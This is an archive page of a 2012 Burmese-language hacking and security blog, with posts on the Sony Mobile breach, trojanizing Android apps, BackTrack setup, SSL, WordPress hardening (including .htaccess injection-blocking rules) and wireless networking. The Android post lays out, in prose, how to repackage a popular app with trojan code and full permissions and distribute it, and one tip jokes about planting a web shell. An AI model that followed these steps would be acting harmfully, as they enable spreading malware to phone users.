Showing posts with label knowledge. Show all posts
Showing posts with label knowledge. Show all posts

Sunday, September 2, 2012

Sony Mobile website hacked by NullCrew


ယခုႏွစ္အတြင္း ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ Sony Mobile website သည္ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ တိုက္ ခိုက္ခံခဲ့ရပါတယ္...။ www.sonymobile.com သည္ Hacker Group တစ္ခုျဖစ္ေသာ Null Crew အဖြဲ႕ မွတိုက္ ခိုက္ခ်င္ကိုခံခဲ့ရျပီး user အမ်ားစုရဲ႕ အခ်က္အလက္မ်ားကို ဖြင့္ခ်ေဖာ္ထုတ္ ခဲ့ပါတယ္...။ဒီသတင္းအခ်က္ အလက္ကိုလဲ တိုက္ခိုက္သူမ်ားျဖစ္တဲ့ Null Crew ရဲ႕ twitter account ထဲမွာေဖာ္ျပခဲ့ျခင္းျဖစ္ပါတယ္...။

သူတို႕ဟာ ထြင္းေဖါက္ ရယူထားေသာသတင္းအခ်က္ အလက္ အစုအစည္းမ်ားကို Pastebin တြင္လဲ ေဖာ္ျပ ထားျပီး ေအာက္ပါ  သတိေပးစာကို ေဖာ္ျပခဲ့ပါတယ္....။

Stats of Dumps

  • 441 ေယာက္ေသာ အသံုးျပဳသူမ်ား၏ username မ်ား email အေကာင့္မ်ား×××××
  • Think_users Table မွ 24 ေယာက္ေသာ user မ်ား၏ Hash passwords မ်ားပါသြားျခင္း××××
  • admin_users Table မွ 3 ေယာက္ေသာ Admin မ်ား၏ အခ်က္အလက္မ်ားပါ၀င္သြားျခင္း×××××

တို႕ပဲျဖစ္ၾကပါတယ္...။

ref: http://thehackernews.com
post by shwekoyantaw
Read More ->>

Saturday, September 1, 2012

၀ိကိလိခ္ ၏ အတြင္းေရးမ်ား ( အပိုင္း ၁ မွ ၇ ) ထိ


၀ိကိလိခ္၏ အတြင္းေရးမ်ား ဆိုတဲ႔ စာအုပ္ကို MCM မွ ကို Giacomo က ဘာသာၿပန္ၿပီး တင္ေပးထားတာၿဖစ္ပါတယ္ ။ ဒီလိုစာအုပ္မ်ိဳးကို ဘာသာၿပန္ၿပီး တင္ေပးဖို႔ဆိုတာ ေတာ္ေတာ္ အားထည့္မွ ရတဲ႔ အလုပ္တစ္ခုပါ ... အခန္း ( ၂၁ ) ခန္းရွိတာ ခုက ( ၁ ) ကေန (၇ ) ထိပါ အခန္း ( ၈ ) ေတာ႔ ၿပီးေနၿပီလို႔ ေၿပာပါတယ္ ။ တင္ထားတာေတာ႔ မေတြ႕မိေသးဘူး... စိတ္၀င္စားဖို႔လည္း ေကာင္းသလို Internet Security နဲ႔ ပက္သက္ၿပီး ကမာကို ကိုင္လွုပ္ခဲ႔တဲ႔ လူေတြ ၿဖစ္လို႔ ပိုၿပီး စိတ္၀င္စားဖို႔ ေကာင္းပါတယ္

Download

http://www.mediafire.com/?y34ckt9u6hvujyq
 
ref:MHU 
Read More ->>

Sunday, August 26, 2012

Creating Andriod Trojan in 5 steps


Android Trojan လုပ္ပံုလုပ္နည္းအေၾကာင္းတစ္ေစ့တစ္ေစာင္းေျပာၾကည့္ရေအာင္။ Trojan ဆိုတာကေတာ့ သိတဲ့အတိုင္းပဲ အစဥ္အလာနဲ့ေနလာတာဆိုေတာ့ android os ေပၚလာခ်ိန္မွာသူလဲ တစ္ေခတ္ထေနျပန္ရဲ့။ အဲ့trojan ေတြ ဘယ္လိုဝင္တာဆို တာေတာ့ ကိုယ္ေပးဝင္လို့ ဝင္တာပါပဲ။ ခင္ဗ်ားဖုန္းကို google က ကိစၥအခ်ိဳ့ကို ဖယ္လိုက္လို့ သိပ္မအံၾသပါနဲ့တဲ့။ malicious codeers ေတြက Android အတြက္ Trojan ေတြေရးနုိင္ပါတယ္တဲ့ ။
ကဲထားပါေတာ့ေလ။ဘယ္လိုလုပ္တယ္ဆိုတာေလးပဲေျပာရေအာင္ :D
Technical Director for Security Reponse က Eric Chien က brand-new Trojan တစ္ေကာင္ကို ပရိတ္သတ္ေရွ့မွာရိုးရွင္းေသာနည္းေတြနဲ့ ေရးျပခဲ့ပါတယ္။ စိတ္မပူပါနဲ့ သူ sample app က အဲ့အခန္းထဲ မွာပဲရွိတာပါ။ တနည္းေျပာရင္ ဖ်က္ပစ္လိုက္တယ္ေပါ့။ သူပံုစံအတိုင္းတစ္ျခားေျမာက္မ်ားစြာေသာအေကာင္ေလးေတြပဲ ထြက္လာတာ :D
ကဲ ခု Chien ရဲ့ ရိုးရွင္းတဲ့ငါးခ်က္ကိုေျပာပါ့မယ္။
၁။ free app တစ္ခု download ဆြဲလိုက္ပါ။ လူၾကိဳက္မ်ားတဲ့တစ္ခုဆိုပိုေကာင္းတာေပါ့။
၂။ PC နဲ့ Suit ျဖစ္မယ့္ language compiler တစ္ခုနဲ့ source code ယူ ျပီးရင္ CPU နားလည္တဲ့ assembly language ကိုေျပာင္းလို္က္။ ဒီနည္းလမ္းတစ္လမ္းပဲရွိတယ္ final executable file ကို source code ေျပာင္းဖို့ဆိုတာ။ android app ေတြက Java language နဲ့ေရးထားတာဆိုေတာ့ original source code ကို လြယ္ကူရုိးရွင္းတဲ့ tools ေတြနဲ့ေျပာင္းလို့ရပါတယ္။
၃။ ဒါကေတာ့နဲနဲလက္ဝင္တယ္လို့ေျပာပါတယ္။ သံုးမယ့္ app က user information ေတြကို third party app ေတြ ဆီ ေ၇ာက္ေအာင္ သံုးလုပ္နုိင္မယ့္ app ေတြဆိုပိုေကာင္းမယ္ဗ်ာ။ Chien ကေတာ့ demonstration မွာ Android.Geinimi ကို သံုးသြားပါတယ္။
၄။ Trojan code ထည့္တာကေတာ့ ရိုးရွင္းပါတယ္။ source code ရွိတဲ့ folder ထဲကို ထည့္မယ္ ျပီးရင္ Trojan code ကို တစ္ျခား app ထဲက code ေတြထက္ အရင္ run ေအာင္နဲနဲခ်ိန္းမယ္။ ျပီးရင္ Trojanized app ကို device တစ္ခုလံုး ထိန္းခ်ဳပ္ခြင့္ရေအာင္ permission ေပးမယ္။ ျပီး ရင္ေတာ့ အဲ့ app ကိုနာမည္ခ်ိန္းလိုက္ေပါ့။ “FREE!!!!” လို့ပါရင္ လူတိုင္းၾကိဳက္တယ္မလား။ (ဒါေရးျပီးရင္ ဝယ္ပဲသံုးေတာ့မယ္ app ေတြကို :D )
၅။ အားလံုးျပီးသြားရင္ ေတာ့ modified app ကို compile လုပ္။ မေျပာင္းလဲ ရွိတဲ့ market ေပၚမွာ တင္လိုက္ေတာ့။ ျပီးရင္ ျပီးျပီ။
အခု လို Trojan မ်ိဳးပါတဲ့ app ကို android Market က လက္မခံပါဘူးတဲ့။ လက္မခံလို့စိတ္မညစ္ပါနဲ့ တရုတ္ ျဖစ္ ေအာင္က်င့္ၾကံလိုက္။ China Market မွာသြားတင္လိုက္။ ကံေကာင္းလို့ ကိုယ္ေရးတတ္ရင္ တရုတ္မလွလွေလးေတြရဲ့ Photo ေလးေတြရမွာေနာ္။ အဲ့ရက်င္ အေနာ္ကို မေမ့နဲ့ေနာ္ :D
အကယ္လို့ tut အကုန္သိခ်င္ပါတယ္ဆိုလို့ရွိရင္ The Hacker News က ထုတ္တဲ့ ၂၀၁၁ နိုဝင္ဘာလထုတ္ မဂၢဇင္းတြင္ Demystifying the Android Malware ဆိုေသာေခါင္းစဥ္ျဖင့္ စာမ်က္နွာ ၁၆ မွာပါရွိပါတယ္။ကၽြန္ေတာ္ အဲ့ tutorial လုပ္ျပီးပါက ျမန္မာလို တင္ေပးပါ့မယ္။ စာဖတ္သူအားလံုး ကိုယ္စိတ္နွစ္ျဖာက်န္းမာခ်မ္းသာၾကပါေစ။

post by  Fortran
copy from Ghostarea.net
Read More ->>

Wednesday, July 4, 2012

Things need to do after installing Backtrack 5




BackTrack စသံုးျပီဆိုတာနဲ႕ ေတြ႕လိုက္ရတဲ့ ျပႆနာေပါင္းေသာင္းေျခာက္ေထာင္မ်ား ႏွင့္ သင့္ရာဆုိင္ရာမ်ားကို ဟိုဟိုဒီဒီမွ ရွာေဖြရင္း ေဖာ္ျပလိုက္ရပါသည္.။ Linux ျဖစ္၍ Beginner မ်ားအတြက္ ခက္ခဲသည္က တစ္ေၾကာင္း Ubuntu ေလာက္ User Friendly မျဖစ္တာကတစ္ေၾကာင္းေၾကာင့္ စတင္သံုးစြဲသူမ်ားအဖို႕ အခက္အခဲေတြေတြ႕ရတတ္ပါတယ္ ပထမဆံုးစက္ကုိစဖြင့္လိုက္ကာရွိေသး အသံမထြက္ဘူး ျဖစ္ေနတတ္ပါတယ္ :-D ဒီမွာကိုစကြိဳင္ပါေလေရာ အဲ့ဒါေလးကိုပထမဆံုးျပင္လုိက္ရေအာင္ system>preferences>startup application ကိုအဆင့္ဆင့္သြားျပီးဖြင့္လိုက္ပါ ေနာက္ က်လာတဲ့ boxမွာ add ကိုနိွပ္ပါ ျပီးရင္ စာေျကာင္းျဖည့္ဖို့သုံလိုင္းက်လာပါမယ္ ေအာက္ကကုဒ္ေတြကိုတစ္ခုခ်င္းစီ ျဖည့္လိုက္ပါ……. Pulseaudio daemon /usr/bin/pulseaudio Start the sound daemon. ျပီးရင္ save ကိုနိွပ္ပါ..ေနာက္ restart ခ်လိုက္ပါ sound system ျပင္လို့ျပီးပါျပီ………. 2 .ျပီးရင္ Wireless ခ်ိတ္ဖို႕လုပ္ၾကရပါ့မယ္ wireless ခ်ိတ္ဖို႕ wicd ကိုသြားရပါ့မယ္ ေနာက္ wicd network manger error ကိုျပင္မယ္ေပါ့… applications>internet>wicd network manger  ကို အဆင့္ဆင့္သြားဖြင့္လုိက္ပါ….error တက္ေနတာကိုေတြ့ရပါလိမ့္မယ္ . terminal ကုိဖြင့္လိုက္ပါ root account နဲ႕ ေအာက္က Command ႏွစ္ေၾကာင္းရိုက္လိုက္ပါ dpkg-reconfigure wicd  update-rc.d wicd defaults  ေနာက္ထုံးစံအတိုင္း termianl ထဲမွာ ကိုယ့္ Ip ကို manual အေနနဲ့ထည့္ပါမယ္ ifconfig eth0 192.168.1.112/24 route add default gw 192.168.1.1 echo nameserver 192.168.1.1 > /etc/resolv.conf ip ေနရာမွာကိုယ့္ ip နဲ့ gw ေနရာမွာ ကိုယ့္ proxy ကိုထည့္ေနာ္…. အဆင္ေျပပါေစ………. Basic software required in backtrack ေခါင္းစဉ္အတိုင္းပဲ အေျခခံအက်ဆုံး software ေတြကိုသြင္းပါမယ္…….

၁။ gtalk အတြက္ empathy ကိုသြင္းပါမယ္ empathy ဆိုတာ Gtalk အျပင္ အျခားေသာ Facebook , Yahoo Mail , Hot Mail တို႕ကိုပါ အသံုးျပဳႏဳိင္ေသာ Instant Messager ပါ . command line ကေတာ့ terminal ထဲမွာ apt-get install empathy ေပါ့ ေနာ္ U နဲ့ကြာတာဆိုလို့ sudo ပါတာနဲ့မပါတာပဲကြာတယ္ ေအာ္ေအး အဲ့ sudo အေျကာင္းနဲနဲေလရွည္လိုက္အုံးမယ္ U မွာက သူက root အေနနဲ့အ၀င္ထားလို့ sudo ခံရတာပါ bt မွာက စ၀င္ကတည္းက root နဲ့၀င္ထားလို့ ခံစရာမလိုေတာ့တာပါ ေတာ္ေတာ္မ်ားမ်ားသိမယ္လို့ထင္ပါတယ္ သူ့ command ေတြကအားလုံးလိုလိုတူပါတယ္..

၂။ flashplugin ကို Install လုပ္ပါမယ္ ထုံးစံအတိုင္းေပ့ါ apt-get install flashplugin-installer ဆိုရပါျပီ

၃။ Movie/Video player ကို install လုပ္ပါမယ္ က်ြန္ေတာ္စမ္းျကည့္သေလာက္ေတာ့ totem media player ကအေကာင္းဆုံးပါပဲ bt နဲ့တည့္ပါတယ္ ထုံးစံအတိုင္းေပ့ါ apt-get install totem-gstreamer ေပါ့ သြင္းျပီးသြားရင္ codec ေတြကိုထပ္သြင္းရပါမယ္ အမ်ိုးမ်ိုးေသာ Video ဖိုင္ေတြကိုဖတ္ေအာင္လို့ပါ ေအာက္က ကုဒ္ေလးကိုထပ္သြင္းလိုက္ပါ….. apt-get install ubuntu-restricted-extras apt-get install w32codecs apt-get install w32codecs libdvdcss2 ျပီးပါျပီ……..ေနာက္တစ္ခုေပါ့

၄။ ေအာ္အေရးျကီးဆုံးတစ္ခုသြင္းဖို့က်န္ေနေသးတယ္……. ubuntu software centre ေလ သြင္းတာေပ့ါေနာ့္ သူရိွရင္အားလုံး အဆင္ေျပတယ္ေလ ထုံးစံအတိုင္းေပ့ါ apt-get install software-center ေပါ့ ရပါျပီ အဲ့ဒါဆိုကိုယ္ျကိုက္တာထည့္လို့ရပါျပီ……..




 editing လုပ္ခ်င္တဲ့သူေတြအတြက္ apt-get install pitivi ေပါ့ ၆။ တစ္ခါတစ္ေလမွာ က်ြန္ေတာ္တို့ CD ေခြေတြကိုဖြင့္ပါတယ္ CD အတြက္အသင့္ေတာ္ဆုံးကေတာ့ Rhythmbox ပါပဲ သြင္းရေအာင္ apt-get install rhythmbox ေပါ့ ဘယ္ေလာက္လြယ္လဲ ေပ်ာ္စရာျကီးေနာ္ window လုိ software ၀ယ္ရတာနဲ့ crack/serial ထည့္ရတာေတြလုံး၀မရိွဘူး အားလုံး free ဟီးဟီး ေပ်ာ္လိုက္တာေျပာရင္းနဲ့ေတာင္ ပိုက္ပိုက္ကုန္ေတာ့ဘူး…. တစ္ခ်ို့လိုအပ္တဲ့ software ေတြကို ubuntu software centre ကေနပဲသြင္းလုိက္ရင္အဆင္အားလုံးေျပသြားပါျပီ။ ၇.Zawgyi font install လုပ္နည္းေလးၾကည့္ရေအာင္ ပထမဆုံး…….ေဇာ္ဂ်ီေဖာင့္ကို အင္တာနက္ကေန download ရယူပါ http://code.google.com/ မွာ zawgyi font tar file ဆိုျပီးရွာလိုက္ပါ ေနာက္ဆုံးထြက္တဲ့ဗားရွင္းကိုေဒါင္းလိုက္ပါ ဟီးဟီး desktop ေပါ္တင္ပါ tar file ေလးနဲ့က်လာပါမယ္ tar file ကိုေျဖပါမယ္ ပုံမွာျကည့္ပါ သုံးရမယ့္ကြန္မန့္ေတြကေတာ့ cd Desktop/ Desktop ေပါ္ေရာက္သြားပါျပီ ေနာက္ ls ကိုေပးပါ zawgyi_keyboard-0.3.3.tar.gz ဆိုေပါ္လာပါမယ္ ပုံမွာလဲျပထားပါတယ္ tar file ေလးကို extract လုပ္ပါမယ္ tar xvf zawgyi_keyboard-0.3.3.tar.gz လို့ရိုက္လိုက္ပါ ေနာက္ enter ေပ့ါ ျပီးရင္ ls နဲ့ျပန္ျကည့္ပါ ေဇာ္ဂ်ီဆိုတ့ဲဖိုင္ေလး Desktop ေပါ္ေရာက္ေနပါလိမ့္မယ္


zawgyi ဆိုတဲ့အခန္းထဲကို၀င္ပါ ျပီးရင္ python နဲ့ run လိုက္ပါ python zawgyi_keyboard.py လို့ရိုက္လိုက္ပါ ျပီးရင္ enter နိွပ္ပါ ေနာက္ Install လုပ္ဖို့ i ကုိနိွပ္လိုက္ပါ install လုပ္ျပီးရင္ q နဲ့ထြက္လိုက္ပါ ပုံမွာျပထားပါတယ္။








ျပီးသြားရင္ keyboard layout နွင့္ keyboard option ကိုပုံမွာျပထားတဲ့အတိုင္း ျပင္လိုက္ပါ 

Post by Aung Kyaw Moe
Source By Ghostarea.net
Read More ->>

Monday, July 2, 2012

What is SSL?



SSL ဆိုတာကေတာ့ Secure Socket Layer ကိုေခၚတာပါ။
သူကဘာလဲဆိုေတာ့ User တစ္ေယာက္ရိုက္ထည့္လိုက္တဲ့ Password တစ္ခုကို Encrypted လုပ္ၿပီးေတာ့ Server ကိုျပန္ပို႔ပါတယ္။ အဲဒီေတာ့ ၾကားကေန Password ကို Sniffing လုပ္မယ္ဆိုရင္ေတာင္ Hacker ဟာ Encrypted လုပ္ထားတဲ့ Password ကိုပဲရသြားပါလိမ့္မယ္။ SSL သံုးထားတဲ့ ဆိုက္ေတြရဲ႕ Address ဟာ https:// နဲ႕စပါတယ္။ ေအာက္ကဓါတ္ပံုေလးေတြကိုၾကည့္ရေအာင္။


ဒါကေတာ့ SSL သံုးမထားတဲ့ ပံုပါ။ ပံုမွာပါတဲ့အတိုင္း User က Server ဆီကို abc ဆိုတဲ့ Password တစ္ခုရိုက္လိုက္ပါတယ္။ ဒါကို Hacker ကၾကားကေန Sniffing လုပ္လိုက္တယ္ဆိုပါေတာ့။ ဒါဆိုရင္ Hacker ဟာ abc ဆိုတဲ့ Password ကိုရသြားပါလိမ့္မယ္။ OK...ေနာက္တစ္ပံုၾကည့္ပါ။

 

ဒါကေတာ့ SSL သံုးထားတဲ့ပံုပါ။ ဒီမွာကေတာ့ abc ဆိုတဲ့ Password ကို Encrypted လုပ္လိုက္ပါတယ္။ Encrypted Method အရ
a = z
b = y
c = x
ဆိုၿပီး zyx လို႔ေျပာင္းလိုက္ပါတယ္။ ဒါကိုပဲ Hacker က Sniffing လုပ္ပါေသးတယ္။ ဒါေပမယ့္ Hacker ရသြားတာက zyx ဆိုတဲ့ Password ျဖစ္သြားပါၿပီ။
Hacker အေနနဲ႕ ဒါကို Decrypted ျပန္လုပ္ဖို႔ ထိုက္သင့္သေလာက္ အခ်ိန္ယူရပါလိမ့္မယ္။ SSL ဆုိတာကေတာ့ ဒါပါပဲခင္ဗ်ာ။
credit:z3r0c00l

post by Dongoth
copy from mmhackforums.com
Read More ->>

Tuesday, June 26, 2012

[ secruity tips ] ဘေလာ့ security ပိုင္းဆိုင္ရာ ~!#



ဘယ္ကလဲေတာ့မသိေတာ့ဖူး ... tips နဲ ့ anotepad ထဲမွာ မွတ္ထားတာေလး ၿပန္ဆြဲထုတ္လာတာပါ ..

၁) Backup လုပ္ရန္
- ဘာပဲလုပ္လုပ္ မၿဖစ္မေန စတင္ေဆာင္ရြက္ရမည့္ ကိစၥကေတာ့ backup ဆိုတာ ဆိုက္ဒ္ေထာင္တဲ့လူအမ်ားစုသိၾကပါတယ္.....

၂) Update WordPress Version
- version ၿမင့္ေပးဖို ့ပါပဲ .. အသစ္ထြက္တဲ့ version တုိင္းဟာ အားနည္းခ်က္ေတြ bugs ေတြကို အတတ္ႏိုင္ဆံုးၿပင္ဆင္ၿပီး blogger ေတြ စိုးရိမ္ေနရတဲ့ ဟက္ခံရၿခင္းမွ အတတ္ႏိုင္ဆံုးကာကြယ္ဖို့လည္း သူလည္း တစ္ခ်က္အပါအဝင္ပါပဲ
၃) Change your Login/Password
- မိမိဘေလာ့ရဲ ့ အက္မင္ ေလာ့ဂ်င္ နာမည္နဲ့ pass ကို အတတ္ႏိုင္ဆံုး ခက္ေအာင္ထားထားပါ... ဥပမာ .. words+upper/lower keys+symbols+numbers ( ဥပမာဗ်ာ - biGb0ss!# ) .
- အက္မင္ login ကိုလည္း ၿပင္ဖို ့အေရးၾကီးပါတယ္.. default အေနနဲ ့သတ္မွတ္ထားတဲ့ admin ဆိုတာကို လံုးဝကို ၿပင္သင့္ပါတယ္... ဘာလို ့လဲဆိုေတာ့ ခုေနာက္ပိုင္းမွာ wp brute attack ကို wordlist နဲ ့လုပ္လာၾကတာေတြ ေတြ ့လာရပါတယ္.. admin default သာၿဖစ္ေနမယ္ဆို admin လို ့ခန္ ့မွန္းပီး wordlist နဲ ့ brute တိုက္ခ်သြားလို ့ကေတာ့ ကိုယ့္ blog security ေကာင္းလွပါခ်ည္ရဲ့ ဆိုတာေတာင္ ဘာ bugs မွမရွိပဲ ဟက္ခံရႏိုင္ပါတယ္...

၄) WordPress Keys in wp-config.php
- ဒီ keys ေတြကေတာ့ data encrypt လုပ္တဲ့ေနရာမွာ salt အေနဲ ့ပါဝင္တဲ့ အတြက္ ဒါလည္း security measures တစ္ခုအေနနဲ ့ ထည့္ပီးၿပင္ဆင္သင့္ပါတယ္.. ( ဒီ key ေတြၿပင္ခ်င္တယ္ဆိုရင္ေတာ့ ဘယ္လုိၿပင္ရတယ္ဆိုတာ နားလည္ေအာင္အရင္ၾကည့္သင့္ပါတယ္.. config ဖိုင္ေနရာမွာ ယူထားတယ္ဆိုကတည္းက သူ ့ဟာ အေရးၾကီးတယ္ဆိုတာ သိသာပါတယ္..)
ဥပမာ.

define(‘AUTH_KEY’, ‘put your unique phrase here’);
define(‘SECURE_AUTH_KEY’, ‘put your unique phrase here’);
define(‘LOGGED_IN_KEY’, ‘put your unique phrase here’);
define(‘NONCE_KEY’, ‘put your unique phrase here’);
https://api.wordpress.org/secret-key/1.1/

၅ ) Install WP Security Scan



ဒီ plugin ေလးလည္း သြင္းထားဖို ့ပါပါတယ္.. သူက မိမိ blog ရဲ ့ vulnerabilities ေတြ malicious codes ေတြကို automated stuff အေနဲ ့ scan မွာပါ.. အေပၚဆံုမွာၿပတဲ့အတိုင္း အစိမ္းေရာင္ေလးေတြပဲဆို အိုေကပါတယ္...

၆) Change Table Prefix




ဒီ table prefix ကိုလည္းၿပင္သင့္ပါတယ္.. default က wp- ပါ ... SQL ေပါက္တယ္ဆိုတာေတာင္မွ wp table prefix ေလးၿပင္ထားရင္ ေဖာက္တဲ့သူကို အခက္ေတြ ့ေစမွာၿဖစ္ပါတယ္. အေပၚမွာ ၿပထားတဲ့ wp security scan plugin ေလးနဲ ့ အလြယ္တကူေၿပာင္းႏိုင္ပါတယ္..

၇) Prevent WordPress Hack by Blocking Search Engine Spiders from Indexing the Admin Section
ဒါေလးကေတာ့ search engine ေတြရဲ ့ bot ေတြက ေန့စဥ္နဲ ့အမွ် crawl လုပ္ေနမွာပါ ... ကိုယ္က permission မပိတ္မွရမွာ.. ႏို ့မို ့ဆို admin section ပါ crawl လုပ္ေနလိမ့္မယ္.. ဒါေလးကို ကာကြယ္ဖို ့ disable indexing from crawler လုပ္ဖို ့ မိမိ panel ရဲ ့ (cpanel ကိုဆိုလိုတာပါ.. admin section မဟုတ္ပါ) ရဲ ့ root directory မွာ robot.txt ဖိုင္ေလးေဆာက္ပီးကာကြယ္ရပါမယ္.. ေအာက္မွာ..

#
User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins/
Disallow: /wp-content/cache/
Disallow: /wp-content/themes/
Disallow: */trackback/
Disallow: */feed/
Disallow: /*/feed/rss/$
Disallow: /category/*

၈) htaccess Hacks
ဒီ hypertext access ကလည္း directroy level file ေတြကို ထိန္းခ်ဳပ္တဲ့ အေရးၾကီးတဲ့ ဖိုင္တစ္မ်ိဳးပါ .. ဒါေလးကိုမ်ားေသာအားၿဇင့္ေတာ့ web root folder မွာထားၾကပါတယ္.. /home/user/public_html ေအာက္မွာထားၾကပါတယ္ မ်ားေသာအားၿဖင့္ .. က်ေနာ္တို ့ symlink လုပ္တဲ့အခါ .. .htaccess ဖိုင္ကလည္း indexing လုပ္ဖို ့ တအပ္တအားပါတယ္ဆိုတာ .. hacker ေတြသိၾကတယ္မလား ... Posted Image
ဒီဖိုင္ေလး အလုပ္လုပ္ပံုကိုေသခ်ာသိမွာ ၿပင္ဆင္ၾကပါ.. မဟုတ္ရင္ ဆိုက္ဒ္ပါက်သြားႏိုင္ပါတယ္.. panel ထဲကဝင္ၿပင္ေနရမယ္.. panel မရွိရင္ေတာ့ ေသပီဆရာပဲ Posted Image ( shell ေလးမသိမသာခိုးတင္ထားေပါ့ ဟိ . ဟိ ... panel မရွိရင္ ) အယ္... security ကေန သူခိုးဘက္ ေရာက္ကုန္ပီ Posted Image Posted Image
http://mmdongoth.net...ccess/index.php

၉) Protect your htaccess
htaccess ကိုလည္း ကာကြယ္ထားဖို ့ေအာက္ကကုဒ္ေလးေတြ ထည့္ထးားသင့္ပါတယ္.. ( warning : htaccess ဖိုင္ကို မေသခ်ာပဲ မသံုးၾကပါနဲ ့.. ဆိုက္ဒ္အတက္အက်က သူ ့ေပၚမွာလဲ မူတည္ေနတယ္ .. သံုးတာမွားရင္ဆိုက္ဒ္ ေဒါင္းသြားႏိုင္ပါတယ္ )

# STRONG HTACCESS PROTECTION</code>
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>

၁၀ ) No Directory Browsing
- အေကာင္းဆံုးကေတာ့ ဘယ္ directory မွာ browsing မေပးထားတာအေကာင္းဆံုးပဲ .. ဒါေလးႏွစ္ေၾကာင္းေလာက္ .htaccess ထဲထည့္ထားေပါ့

# disable directory browsing
Options All -Indexes

၁၁) Secure wp-config.php
- ဆိုက္ဒ္ကို online တင္ေပးတာ wp-config.php ဖိုင္ပါ. hacker ေတြက ဒီဖိုင္ကေန code ေတြရယူပီး ဆိုက္ဒ္ကို ထိုးေဖာက္ဝင္ေရာက္ၾကပါတယ္.. ဒါေၾကာင့္ အဲ့ဖိုင္ကို ကာကြယ္ဖို ့လဲ .htacess ထဲမွာ ဒီ code ကိုထည့္ထားသင့္ပါတယ္

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>
The code denies access to the wp-config.php file to everyone!

၁၂) Limit Access to the Wp-Content Directory
- wp-content dir ကိုလည္းကာကြယ္ဖို ့ .htaccess ထဲမွာ

Order deny,allow
Deny from all
<Files ~ “.(xml|css|jpe?g|png|gif|js)$”>
Allow from all
</Files>

ၿဖည့္ပါ.

၁၃) Protect WordPress Admin Files
- wp-admin ဖိုင္ကို တၿခားလူ access မ၇ေအာင္ ဒီကုဒ္နဲ ့ကာထားပါ .. .htaccess ထဲမွာ

# deny access to wp admin
order deny,allow
allow from xx.xx.xx.xx # This is your static IP
deny from all

ၾကည့္လိုက္ရင္သိသာပါတယ္.. xx.xx.xx.xx IP မဟုတ္ရင္ browsing လုပ္ခြင့္မရပါဖူး ..

၁၄) Prevent script injection

ဒါေလးကို ၿပည့္စံုေအာင္ http://www.wprecipes...access]ဒီမွာဖတ္ လည္းရပါတယ္
Simple copy and paste the code below to your htaccess in the root
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

BONUS အေနနဲ ့ http://wordpress.org/extend/plugins/wordpress-firewall-2/ wp firewall plugins လည္းရွိပါတယ္.. ဒါေပမယ့္ ဒါကလည္း တခါတေလ ကုိယ့္ acttion ကိုေတာင္ block တတ္ပါသတဲ့ ဒါေၾကာင့္ စူူပါ ဟက္ကာေတြ စူပါ bot ေတြလာႏိုင္မယ္ဆိုမွ သံုးၾကပါ .. Posted Image

အၿပည့္အစံုေတာ့ မဟုတ္ေပမယ့္ ဒီေလာက္နဲ ့ဆိုလည္း security ေကာင္းႏိုင္မယ္ထင္ပါတယ္.. But there's no 100% security လို ့ေတာ့ က်ေနာ္ကေတာ့ ခံယူထားပါတယ္ Posted Image
ေနာက္ထပ္ေကာင္းမယ္ထင္တာရွိရင္ ထပ္ၿဖည့္ေပးၾကေပါ့...

ခရက္တစ္=ကိုတုတ္ေကာက္
Copy from : http://mmhackforums.com//index.php?/topic/291-secruity-tips-%E1%80%98%E1%80%B1%E1%80%9C%E1%80%AC%E1%80%B7-security-%E1%80%95%E1%80%AD%E1%80%AF%E1%80%84%E1%80%B9%E1%80%B8%E1%80%86%E1%80%AD%E1%80%AF%E1%80%84%E1%80%B9%E1%80%9B%E1%80%AC/page__pid__699#entry699


Read More ->>

Monday, June 25, 2012

Wireless Local Area Network



ပထမဆံုးမိတ္ဆက္ ပို႔စ္ေလး အေနနဲ႔ ေဘာစိလည္းေရးခိုင္းတာနဲ႔ WLAN အေၾကာင္းေလး အစပ်ိဳးလိုက္ပါတယ္ ။ ဟက္နည္းေတြၾကီး လုပ္ေနတာေရာ သီအိုရီ ေရးနဲ႔ဆို ပိုၿပီး ထိေရာက္မယ္ ယူဆလို႔ တင္လိုက္ပါတယ္ဗ်ာ ။

Wireless Network ခိ်တ္ဆက္မည္ဆိုပါက ေအာက္ပါနည္းလမ္းနွစ္သြယ္ျဖင့္ခိ်တ္ဆက္နိုင္ ပါသည္။ ယင္းတို့မွာ -
၁ ) Ad.hoc Mode
၂) Infrastructure Mode
ဟူ၍ျဖစ္ပါသည္။

၁) Ad.hoc Mode (IBSS)
Ad.hoc အားတစ္နည္းအားျဖင့္ Independent Basic Service Set ဟူ၍ လည္း ေခၚပါသည္။ယင္း Ad.hoc Mode သည္ Computer အခ်င္းခ်င္း Wireless Adpater တမ်ိဳးတည္း ျဖင့္သာအသံုးျပုခိ်တ္ဆက္ျခင္းျဖစ္ပါသည္။ ထို့ခိ်တ္ဆက္မႈတြင္မည္သည့္ျကားခံပစၥည္း မွမလိုအပ္ပါ။



၂) Infrastructure Mode(BSS)
Infrastructure Mode အားတစ္နည္းအားျဖင့္ Basic Service Set ဟူ၍လည္းေခၚပါ သည္။။ယင္း Infrastructure Mode သည္ Computer အခ်င္းခ်င္းခိ်တ္ဆက္ရာတြင္း Wireless Adpater နွင့္ Wireless Access Point (or) Wireless Router တို႔ကို အသံုးျပုခိ်တ္ဆက္ျခင္း ျဖစ္ပါသည္။ ထို့ေျကာင့္ Wireless Adpater သည္အသံုးျပုသူမ်ား၏ ေရြးခ်ယ္မွု ေပးတြင္ မူတည္ပါသည္ ။
 



Wi-Fi Technology
